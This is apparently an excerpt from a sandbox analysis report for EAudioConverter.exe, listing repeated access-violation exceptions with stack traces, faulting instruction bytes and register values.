__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134221824 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134221824 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134225920 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134225920 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134230016 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134230016 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134234112 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134234112 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134238208 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134238208 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134242304 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134242304 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134246400 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134246400 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134250496 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134250496 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134254592 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134254592 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134258688 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134258688 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134262784 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134262784 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134266880 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134266880 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134270976 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134270976 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134275072 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134275072 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134279168 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134279168 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134283264 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134283264 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134287360 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134287360 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134291456 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134291456 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134295552 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134295552 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134299648 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134299648 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134303744 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134303744 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134307840 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134307840 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134311936 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134311936 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134316032 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134316032 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134320128 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134320128 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134324224 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134324224 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134328320 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134328320 registers.ecx: 1638264	1
